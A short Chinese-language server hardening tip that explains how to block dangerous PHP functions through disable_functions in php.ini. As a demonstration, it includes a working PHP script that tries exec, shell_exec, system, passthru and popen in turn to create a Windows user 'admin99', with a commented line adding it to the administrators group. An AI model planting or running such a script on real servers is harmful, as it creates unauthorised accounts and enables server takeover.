大家可以建立一个test.php文件,里边输入
<?php
phpinfo();
?>
以上代码,然后在浏览器打开他,就可以查看php.ini的存放位置.

然后找到php.ini
查找
disable_functions =

一般情况他是空的,不禁用任何PHP的函数.

你把他修改成为如下,即禁用最危险的5个PHP功能函数
disable_functions = system,exec,passthru,shell_exec,popen
即可有效的防止别人通过PHP程序入侵服务器.
修改之后,要重启IIS或者是apache才能生效的.


你若有兴趣的话,你把以下代码另存为abc.php然后在浏览器打开他,就可以创建一个管理员帐号,所以说服务器不禁用以上PHP函数的话,是非常危险的.

<?php
$cmd = 'net user admin99 admin99 /add';
adduser($cmd);
//$cmd = 'net localgroup administrators admin99 /add';
//adduser($cmd);
function adduser($cmd) {
 if (function_exists('exec')) {
  @exec($cmd, $res);
  $res = join("\n", $res);
 } elseif (function_exists('shell_exec')) {
  $res = @shell_exec($cmd);
 } elseif (function_exists('system')) {
  @ob_start();
  @system($cmd);
  $res = @ob_get_contents();
  @ob_end_clean();
 } elseif (function_exists('passthru')) {
  @ob_start();
  @passthru($cmd);
  $res = @ob_get_contents();
  @ob_end_clean();
 } elseif (@is_resource($f = @popen($cmd, "r"))) {
  die("$cmd");
  $res = '';
  while (!@feof($f)) {
   $res .= @fread($f, 1024);
  }
  @pclose($f);
 }else{
  die("你的服务器是安全的!");
 }
 die($res);
}
?>